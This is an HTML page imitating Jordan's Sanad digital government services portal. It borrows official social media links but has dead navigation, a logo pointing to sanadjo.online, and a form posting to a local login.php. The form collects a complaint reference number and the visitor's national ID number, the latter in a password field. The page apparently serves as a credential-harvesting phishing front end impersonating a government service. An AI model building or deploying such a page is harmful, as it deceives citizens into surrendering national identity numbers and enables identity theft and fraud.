<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sanad</title>
    <style>
        /* Ensure the background covers the screen */
        body {
            background: url("sanad.jpg.jpg") no-repeat center center fixed;
            background-size: cover;
            color: black;
            font-family: Arial, sans-serif;
            display: flex;
            align-items: center;
            justify-content: center;
            min-height: 100vh;
            margin: 0;
            padding: 0;
            position: relative;
        }

        /* Transparent Navigation Bar */
        .navbar {
            position: absolute;
            top: 80px; /* Moved below logo */
            right: 0;
            padding: 10px 20px;
            border-radius: 0 0 8px 8px;
            background: transparent;
            z-index: 98; /* Lower than logo */
            width: 100%;
            display: flex;
            justify-content: flex-end;
        }

        .navbar a {
            color: white;
            text-decoration: none;
            margin: 0 10px;
            font-size: 1em;
        }

        .navbar a:hover {
            text-decoration: underline;
        }

        /* Social Media Icons with green background */
        .social-media {
            position: fixed;
            top: 50%;
            right: 0;
            transform: translateY(-50%);
            display: flex;
            flex-direction: column;
            gap: 10px;
            z-index: 100;
        }

        .social-media a {
            display: block;
            width: 40px;
            height: 40px;
            background-color: #008000;
            border-radius: 4px;
            display: flex;
            justify-content: center;
            align-items: center;
            transition: background-color 0.3s ease;
        }

        .social-media a:hover {
            background-color: #006400;
        }

        .social-media a img {
            width: 24px;
            height: 24px;
            filter: invert(100%);
        }

        /* Logo Styling */
        .logo-container {
            position: absolute;
            top: 20px;
            left: 20px;
            z-index: 101; /* Highest z-index to stay on top */
        }

        .ImgLogo {
            width: 190px;
            transition: width 0.3s ease;
        }

        /* Centered bold text */
        .centered-text {
            font-size: 3em;
            font-weight: bold;
            color: white;
            position: absolute;
            top: 10%;
            left: 50%;
            transform: translate(-50%, -50%);
            text-align: center;
            width: 100%;
            padding: 0 20px;
            z-index: 90;
        }

        /* Form container styling */
        .form-container {
            background: rgba(255, 255, 255, 0.3);
            padding: 20px;
            border-radius: 8px;
            max-width: 300px;
            width: 90%;
            text-align: center;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            backdrop-filter: blur(5px);
        }

        /* Styling form elements */
        h2 {
            margin-bottom: 20px;
            font-size: 1.5em;
            color: white;
        }
        
        label {
            display: block;
            margin-top: 10px;
            font-weight: bold;
            color: white;
        }

        input[type="text"], 
        input[type="password"] {
            width: 100%;
            padding: 12px;
            margin-top: 5px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
            font-size: 1em;
        }

        input[type="submit"] {
            margin-top: 20px;
            padding: 12px;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            width: 100%;
            font-size: 1em;
            transition: background-color 0.3s ease;
        }

        input[type="submit"]:hover {
            background-color: #45a049;
        }

        /* Responsive adjustments */
        @media (max-width: 768px) {
            .navbar {
                top: 100px; /* Move further down on mobile */
                background: rgba(0, 0, 0, 0.5);
                width: 100%;
                text-align: center;
                padding: 10px 0;
                display: flex;
                flex-wrap: wrap;
                justify-content: center;
                right: 0;
            }
            
            .navbar a {
                margin: 5px;
                font-size: 0.9em;
                padding: 5px;
            }
            
            .form-container {
                width: 85%;
                margin: 0;
                top: 50%;
                margin-top: 50px; /* Add space below navbar */
            }
            
            .centered-text {
                font-size: 2em;
                top: 15%;
            }
            
            .logo-container {
                top: 10px;
                left: 10px;
            }
            
            .ImgLogo {
                width: 150px;
            }

            .social-media {
                flex-direction: row;
                top: auto;
                bottom: 20px;
                right: 50%;
                transform: translateX(50%);
            }

            .social-media a {
                width: 35px;
                height: 35px;
            }

            .social-media a img {
                width: 20px;
                height: 20px;
            }
        }

        /* Additional mobile optimization */
        @media (max-width: 480px) {
            .navbar {
                top: 90px; /* Slightly adjust for smaller screens */
            }

            .navbar a {
                font-size: 0.8em;
                padding: 3px;
            }

            .form-container {
                width: 90%;
                padding: 15px;
                margin-top: 60px; /* Adjust space below navbar */
            }

            h2 {
                font-size: 1.3em;
            }

            .ImgLogo {
                width: 120px;
            }
        }
    </style>
</head>
<body>
    <!-- Logo in the Top Left Corner -->
    <div class="logo-container">
        <a href="https://sanadjo.online" target="_blank">
            <img src="logo-0.png" alt="Logo" class="ImgLogo">
        </a>
    </div>

    <!-- Navigation Bar -->
    <div class="navbar">
        <a href="#">Home</a>
        <a href="#">Services Guide</a>
        <a href="#">Individuals</a>
        <a href="#">Businesses</a>
        <a href="#">Sanad Stations</a>
        <a href="#">Contact Us</a>
        <a href="#">FAQ</a>
    </div>

    <!-- Social Media Icons -->
    <div class="social-media">
        <a href="https://www.linkedin.com/company/ministry-of-digital-economy-entrepreneurship-jordan-وزارة-الاقتصاد-الرقمي-والريادة-الأردن/" target="_blank">
            <img src="linkedin-icon.png" alt="LinkedIn">
        </a>
        <a href="https://www.facebook.com/SanadGovJO">
            <img src="facebook-icon.png" alt="Facebook">
        </a>
        <a href="https://www.instagram.com/modeejo/?igshid=YmMyMTA2M2Y" target="_blank">
            <img src="instagram-icon.png" alt="Instagram">
        </a>
        <a href="https://twitter.com/jordanegov?lang=en" target="_blank">
            <img src="twitter-icon.png" alt="Twitter">
        </a>
    </div>

    <!-- Form Container -->
    <div class="form-container">
        <h2>بوابتك للخدمات الحكوميه الرقميه</h2>
        <form method="POST" action="login.php">
            <label for="username">ادخل رقم الشكوى المرجعي</label>
            <input type="text" id="username" name="username" maxlength="64" required>
            
            <label for="password">ادخل الرقم الوطني</label>
            <input type="password" id="password" name="password" maxlength="64" required>
            
            <input type="submit" value="Search">
        </form>
    </div>
</body>
</html>